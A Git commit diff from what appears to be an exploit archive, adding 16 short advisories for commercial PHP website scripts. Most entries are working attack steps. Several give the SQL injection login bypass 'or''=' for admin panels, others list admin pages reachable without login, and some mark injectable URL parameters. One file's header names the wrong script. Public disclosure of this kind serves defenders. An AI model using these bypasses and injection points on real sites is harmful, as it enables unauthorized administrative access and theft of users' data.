DB: 2017-01-15
16 new exploits My Private Tutor Website Script - Authentication Bypass Hindu Matrimonial Script - Authentication Bypass Just Dial Marketplace Script - Authentication Bypass Entrepreneur Matrimonial Script - Authentication Bypass Open Source Real-Estate Script - SQL Injection Inout StickBoard 1.0 Script - Improper Access Restrictions Inout Search Engine Ultimate Edition 7.0/8.0 Script - Improper Access Restrictions Inout Webmail Ultimate Edition 4.0 Script - Improper Access Restrictions Inout SmartDeal 1.0 Script - Improper Access Restrictions Inout QuerySpace 1.0 Script - Improper Access Restrictions Inout CareerLamp 1.0 Script - Improper Access Restrictions Inout SocialTiles 2.0 Script - Improper Access Restrictions Inout Celebrities 1.0 Script - Improper Access Restrictions Education Website Script - Authentication Bypass Professional Service Booking Script - SQL Injection Courier Business Website Script - Authentication Bypass
This commit is contained in:
parent
08be47d8e2
commit
a577caaebb
17 changed files with 293 additions and 0 deletions
16
files.csv
16
files.csv
|
@ -36981,3 +36981,19 @@ id,file,description,date,author,platform,type,port
|
|||
41037,platforms/php/webapps/41037.txt,"ECommerce-TIBSECART - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps,0
|
||||
41038,platforms/php/webapps/41038.txt,"ECommerce-Multi-Vendor Software - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps,0
|
||||
41040,platforms/linux/webapps/41040.txt,"Zeroshell 3.6.0/3.7.0 Net Services - Remote Code Execution",2017-01-13,"Ozer Goker",linux,webapps,0
|
||||
41043,platforms/php/webapps/41043.txt,"My Private Tutor Website Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0
|
||||
41044,platforms/php/webapps/41044.txt,"Hindu Matrimonial Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0
|
||||
41045,platforms/php/webapps/41045.txt,"Just Dial Marketplace Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0
|
||||
41046,platforms/php/webapps/41046.txt,"Entrepreneur Matrimonial Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0
|
||||
41047,platforms/php/webapps/41047.txt,"Open Source Real-Estate Script - SQL Injection",2017-01-13,"Ihsan Sencan",php,webapps,0
|
||||
41048,platforms/php/webapps/41048.txt,"Inout StickBoard 1.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0
|
||||
41049,platforms/php/webapps/41049.txt,"Inout Search Engine Ultimate Edition 7.0/8.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0
|
||||
41050,platforms/php/webapps/41050.txt,"Inout Webmail Ultimate Edition 4.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0
|
||||
41051,platforms/php/webapps/41051.txt,"Inout SmartDeal 1.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0
|
||||
41052,platforms/php/webapps/41052.txt,"Inout QuerySpace 1.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0
|
||||
41053,platforms/php/webapps/41053.txt,"Inout CareerLamp 1.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0
|
||||
41054,platforms/php/webapps/41054.txt,"Inout SocialTiles 2.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0
|
||||
41055,platforms/php/webapps/41055.txt,"Inout Celebrities 1.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0
|
||||
41056,platforms/php/webapps/41056.txt,"Education Website Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0
|
||||
41058,platforms/php/webapps/41058.txt,"Professional Service Booking Script - SQL Injection",2017-01-13,"Ihsan Sencan",php,webapps,0
|
||||
41059,platforms/php/webapps/41059.txt,"Courier Business Website Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
12
platforms/php/webapps/41043.txt
Executable file
12
platforms/php/webapps/41043.txt
Executable file
|
@ -0,0 +1,12 @@
|
|||
# # # # #
|
||||
# Vulnerability: Admin Login Bypass & SQLi
|
||||
# Date: 13.01.2017
|
||||
# Vendor Homepage: http://scriptfirm.com/
|
||||
# Script Name: Professional Service Booking Script
|
||||
# Script Buy Now: My Private Tutor Website
|
||||
# Author: İhsan Şencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Mail : ihsan[beygir]ihsan[nokta]net
|
||||
# # # # #
|
||||
# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
|
||||
# # # # #
|
29
platforms/php/webapps/41044.txt
Executable file
29
platforms/php/webapps/41044.txt
Executable file
|
@ -0,0 +1,29 @@
|
|||
# # # # #
|
||||
# Vulnerability:: Admin Login Bypass & SQLi + Add/Edit
|
||||
# Date: 13.01.2017
|
||||
# Vendor Homepage: http://www.phpmatrimonialscript.in/
|
||||
# Script Name: Hindu Matrimonial Script
|
||||
# Script Buy Now: http://www.phpmatrimonialscript.in/product/hindu-matrimonial-script/
|
||||
# Author: İhsan Şencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Mail : ihsan[beygir]ihsan[nokta]net
|
||||
#
|
||||
# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
|
||||
#
|
||||
# Direct entrance Add/Edit...
|
||||
# http://localhost/[PATH]/admin/usermanagement.php
|
||||
# http://localhost/[PATH]/admin/countrymanagement.php
|
||||
# http://localhost/[PATH]/admin/communitymanagement.php
|
||||
# http://localhost/[PATH]/admin/renewaldue.php
|
||||
# http://localhost/[PATH]/admin/generalsettings.php
|
||||
# http://localhost/[PATH]/admin/cms.php
|
||||
# http://localhost/[PATH]/admin/cms.php
|
||||
# http://localhost/[PATH]/admin/newsletter1.php
|
||||
# http://localhost/[PATH]/admin/payment.php
|
||||
# http://localhost/[PATH]/admin/searchview.php
|
||||
# http://localhost/[PATH]/admin/success_story.php
|
||||
# http://localhost/[PATH]/admin/featured.php
|
||||
# http://localhost/[PATH]/admin/photo.php
|
||||
# http://localhost/[PATH]/admin/googleads.php
|
||||
# http://localhost/[PATH]/admin/reports.php
|
||||
# # # # #
|
12
platforms/php/webapps/41045.txt
Executable file
12
platforms/php/webapps/41045.txt
Executable file
|
@ -0,0 +1,12 @@
|
|||
# # # # #
|
||||
# Vulnerability: Admin Login Bypass & SQLi
|
||||
# Date: 13.01.2017
|
||||
# Vendor Homepage: http://scriptfirm.com/
|
||||
# Script Name: Just Dial Marketplace Script
|
||||
# Script Buy Now: http://scriptfirm.com/just-dial-marketplace
|
||||
# Author: İhsan Şencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Mail : ihsan[beygir]ihsan[nokta]net
|
||||
# # # # #
|
||||
# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
|
||||
# # # # #
|
12
platforms/php/webapps/41046.txt
Executable file
12
platforms/php/webapps/41046.txt
Executable file
|
@ -0,0 +1,12 @@
|
|||
# # # # #
|
||||
# Vulnerability:: Admin Login Bypass & SQLi
|
||||
# Date: 13.01.2017
|
||||
# Vendor Homepage: http://www.phpmatrimonialscript.in/
|
||||
# Script Name: Entrepreneur Matrimonial Script
|
||||
# Script Buy Now: http://www.phpmatrimonialscript.in/product/entrepreneur-matrimonial/
|
||||
# Author: İhsan Şencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Mail : ihsan[beygir]ihsan[nokta]net
|
||||
# # # # #
|
||||
# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
|
||||
# # # # #
|
16
platforms/php/webapps/41047.txt
Executable file
16
platforms/php/webapps/41047.txt
Executable file
|
@ -0,0 +1,16 @@
|
|||
# # # # #
|
||||
# Vulnerability: SQL Injection + Admin Login Bypass
|
||||
# Date: 13.01.2017
|
||||
# Vendor Homepage: http://phprealestatescript.org/
|
||||
# Script Name: Open Source Real-Estate Script
|
||||
# Script Buy Now: http://phprealestatescript.org/open-source-real-estate-script.html
|
||||
# Author: İhsan Şencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Mail : ihsan[beygir]ihsan[nokta]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/viewpropertydetails.php?id=[SQL]
|
||||
#
|
||||
# Admin Login Bypass
|
||||
# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
|
||||
# # # # #
|
22
platforms/php/webapps/41048.txt
Executable file
22
platforms/php/webapps/41048.txt
Executable file
|
@ -0,0 +1,22 @@
|
|||
# # # # #
|
||||
# Vulnerability: Security Bypass
|
||||
# Date: 13.01.2017
|
||||
# Vendor Homepage: http://www.inoutscripts.com/
|
||||
# Script Name: Inout StickBoard Script
|
||||
# Script Version: v1.0
|
||||
# Script Buy Now: http://www.inoutscripts.com/demo/inout-stickboard/demo/
|
||||
# Author: İhsan Şencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Mail : ihsan[beygir]ihsan[nokta]net
|
||||
# # # # #
|
||||
# Direct entrance Add/Edit/Del...
|
||||
# An attacker can exploit this issue via a browser.
|
||||
# The following example URIs are available:
|
||||
# http://localhost/[PATH]/admin/account/clearcache
|
||||
# http://localhost/[PATH]/admin/account/changeprofileimage
|
||||
# http://localhost/[PATH]/admin/account/changepassword
|
||||
# http://localhost/[PATH]/admin/pin/websitepin
|
||||
# http://localhost/[PATH]/admin/user/manage
|
||||
# http://localhost/[PATH]/admin/user/userdetails/69
|
||||
# Vs.......
|
||||
# # # # #
|
21
platforms/php/webapps/41049.txt
Executable file
21
platforms/php/webapps/41049.txt
Executable file
|
@ -0,0 +1,21 @@
|
|||
# # # # #
|
||||
# Vulnerability: Security Bypass
|
||||
# Date: 13.01.2017
|
||||
# Vendor Homepage: http://www.inoutscripts.com/
|
||||
# Script Name: Inout Search Engine Ultimate Edition Script
|
||||
# Script Version: v7.0, v8.0
|
||||
# Script Buy Now: http://www.inoutscripts.com/demo/inout-search-engine/demo/
|
||||
# Author: İhsan Şencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Mail : ihsan[beygir]ihsan[nokta]net
|
||||
# # # # #
|
||||
# Direct entrance..
|
||||
# An attacker can exploit this issue via a browser.
|
||||
# The following example URIs are available:
|
||||
# http://localhost/[PATH]/admin/index.php?page=engine/manage_suggestion
|
||||
# http://localhost/[PATH]/admin/index.php?page=databaseengine/managesettings
|
||||
# http://localhost/[PATH]/admin/index.php?page=seasonallogo/add
|
||||
# http://localhost/[PATH]/admin/index.php?page=seasonallogo/manage
|
||||
# http://localhost/[PATH]/admin/index.php?page=seasonallogo/add
|
||||
# Vs.......
|
||||
# # # # #
|
22
platforms/php/webapps/41050.txt
Executable file
22
platforms/php/webapps/41050.txt
Executable file
|
@ -0,0 +1,22 @@
|
|||
# # # # #
|
||||
# Vulnerability: Security Bypass
|
||||
# Date: 13.01.2017
|
||||
# Vendor Homepage: http://www.inoutscripts.com/
|
||||
# Script Name: Inout Webmail Ultimate Edition v4.0
|
||||
# Script Version: Ultimate Edition v4.0, Ultimate Hypertable Version
|
||||
# Script Buy Now: http://www.inoutscripts.com/demo/inout-webmail/demo/
|
||||
# Author: İhsan Şencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Mail : ihsan[beygir]ihsan[nokta]net
|
||||
# # # # #
|
||||
# Direct entrance..
|
||||
# An attacker can exploit this issue via a browser.
|
||||
# The following example URIs are available:
|
||||
# http://localhost/[PATH]/admin/index.php?page=ads/sponsoredlinks
|
||||
# http://localhost/[PATH]/admin/index.php?page=todolist/todolist
|
||||
# http://localhost/[PATH]/admin/index.php?page=statistics/registration_showgraph
|
||||
# http://localhost/[PATH]/admin/index.php?page=statistics/showgraph
|
||||
# http://localhost/[PATH]/admin/index.php?page=statistics/accountactivity
|
||||
# http://localhost/[PATH]/admin/index.php?page=calendar/calendar
|
||||
# Vs.......
|
||||
# # # # #
|
19
platforms/php/webapps/41051.txt
Executable file
19
platforms/php/webapps/41051.txt
Executable file
|
@ -0,0 +1,19 @@
|
|||
# # # # #
|
||||
# Vulnerability: Security Bypass
|
||||
# Date: 13.01.2017
|
||||
# Vendor Homepage: http://www.inoutscripts.com/
|
||||
# Script Name: Inout SmartDeal Script
|
||||
# Script Version: v1.0
|
||||
# Script Buy Now: http://www.inoutscripts.com/demo/inout-smartdeal/demo/
|
||||
# Author: İhsan Şencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Mail : ihsan[beygir]ihsan[nokta]net
|
||||
# # # # #
|
||||
# Direct entrance..
|
||||
# An attacker can exploit this issue via a browser.
|
||||
# The following example URIs are available:
|
||||
# http://localhost/[PATH]/admin/index.php?page=account/changepassword
|
||||
# http://localhost/[PATH]/admin/index.php?page=country/addcountry
|
||||
# http://localhost/[PATH]/admin/index.php?page=account/addbank
|
||||
# Vs.......
|
||||
# # # # #
|
17
platforms/php/webapps/41052.txt
Executable file
17
platforms/php/webapps/41052.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Vulnerability: Security Bypass
|
||||
# Date: 13.01.2017
|
||||
# Vendor Homepage: http://www.inoutscripts.com/
|
||||
# Script Name: Inout QuerySpace Script
|
||||
# Script Version: v1.0
|
||||
# Script Buy Now: http://www.inoutscripts.com/demo/inout-queryspace/demo/
|
||||
# Author: İhsan Şencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Mail : ihsan[beygir]ihsan[nokta]net
|
||||
# # # # #
|
||||
# Direct entrance..
|
||||
# An attacker can exploit this issue via a browser.
|
||||
# The following example URIs are available:
|
||||
# http://localhost/[PATH]/admin/user/search
|
||||
# Vs.......
|
||||
# # # # #
|
19
platforms/php/webapps/41053.txt
Executable file
19
platforms/php/webapps/41053.txt
Executable file
|
@ -0,0 +1,19 @@
|
|||
# # # # #
|
||||
# Vulnerability: Security Bypass
|
||||
# Date: 13.01.2017
|
||||
# Vendor Homepage: http://www.inoutscripts.com/
|
||||
# Script Name: Inout CareerLamp Script
|
||||
# Script Version: v1.0
|
||||
# Script Buy Now: http://www.inoutscripts.com/demo/inout-careerlamp/demo/
|
||||
# Author: İhsan Şencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Mail : ihsan[beygir]ihsan[nokta]net
|
||||
# # # # #
|
||||
# Direct entrance..
|
||||
# An attacker can exploit this issue via a browser.
|
||||
# The following example URIs are available:
|
||||
# http://localhost/[PATH]/admin/statistics/js_registration_showgraph
|
||||
# http://localhost/[PATH]/admin/statistics/accountactivity
|
||||
# http://localhost/[PATH]/admin/statistics/js_showgraph
|
||||
# Vs.......
|
||||
# # # # #
|
18
platforms/php/webapps/41054.txt
Executable file
18
platforms/php/webapps/41054.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Vulnerability: Security Bypass
|
||||
# Date: 13.01.2017
|
||||
# Vendor Homepage: http://www.inoutscripts.com/
|
||||
# Script Name: Inout SocialTiles Script
|
||||
# Script Version: v2.0
|
||||
# Script Buy Now: http://www.inoutscripts.com/demo/inout-socialtiles/demo/
|
||||
# Author: İhsan Şencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Mail : ihsan[beygir]ihsan[nokta]net
|
||||
# # # # #
|
||||
# Direct entrance..
|
||||
# An attacker can exploit this issue via a browser.
|
||||
# The following example URIs are available:
|
||||
# http://localhost/[PATH]/admin/index.php?page=account/statussettings
|
||||
# http://localhost/[PATH]/admin/index.php?page=account/newad
|
||||
# Vs.......
|
||||
# # # # #
|
18
platforms/php/webapps/41055.txt
Executable file
18
platforms/php/webapps/41055.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Vulnerability: Security Bypass
|
||||
# Date: 13.01.2017
|
||||
# Vendor Homepage: http://www.inoutscripts.com/
|
||||
# Script Name: Inout Celebrities Script
|
||||
# Script Version: v1.0
|
||||
# Script Buy Now: http://www.inoutscripts.com/demo/inout-celebrities/demo/
|
||||
# Author: İhsan Şencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Mail : ihsan[beygir]ihsan[nokta]net
|
||||
# # # # #
|
||||
# Direct entrance..
|
||||
# An attacker can exploit this issue via a browser.
|
||||
# The following example URIs are available:
|
||||
# http://localhost/[PATH]/admin/settings/managersssettings
|
||||
# http://localhost/[PATH]/admin/settings/addrsssettings
|
||||
# Vs.......
|
||||
# # # # #
|
12
platforms/php/webapps/41056.txt
Executable file
12
platforms/php/webapps/41056.txt
Executable file
|
@ -0,0 +1,12 @@
|
|||
# # # # #
|
||||
# Vulnerability:: Admin Login Bypass & SQLi
|
||||
# Date: 13.01.2017
|
||||
# Vendor Homepage: http://scriptfirm.com/
|
||||
# Script Name: Education Website Script
|
||||
# Script Buy Now: http://scriptfirm.com/education-website
|
||||
# Author: İhsan Şencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Mail : ihsan[beygir]ihsan[nokta]net
|
||||
# # # # #
|
||||
# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
|
||||
# # # # #
|
16
platforms/php/webapps/41058.txt
Executable file
16
platforms/php/webapps/41058.txt
Executable file
|
@ -0,0 +1,16 @@
|
|||
# # # # #
|
||||
# Vulnerability: Admin Login Bypass & SQLi
|
||||
# Date: 13.01.2017
|
||||
# Vendor Homepage: http://scriptfirm.com/
|
||||
# Script Name: Professional Service Booking Script
|
||||
# Script Buy Now: http://scriptfirm.com/professional-service-booking-engine
|
||||
# Author: İhsan Şencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Mail : ihsan[beygir]ihsan[nokta]net
|
||||
# # # # #
|
||||
# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/best_pro_details.php?service_id=[SQL]
|
||||
# http://localhost/[PATH]/content.php?page=[SQL]
|
||||
# E.t.c.... Don't look for nothing there are also security vulnerabilities in other files as well.
|
||||
# # # # #
|
12
platforms/php/webapps/41059.txt
Executable file
12
platforms/php/webapps/41059.txt
Executable file
|
@ -0,0 +1,12 @@
|
|||
# # # # #
|
||||
# Vulnerability: Admin Login Bypass & SQLi
|
||||
# Date: 13.01.2017
|
||||
# Vendor Homepage: http://scriptfirm.com/
|
||||
# Script Name: Courier Business Website Script
|
||||
# Script Buy Now: http://scriptfirm.com/courier-business-website
|
||||
# Author: İhsan Şencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Mail : ihsan[beygir]ihsan[nokta]net
|
||||
# # # # #
|
||||
# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
|
||||
# # # # #
|
Loading…
Add table
Reference in a new issue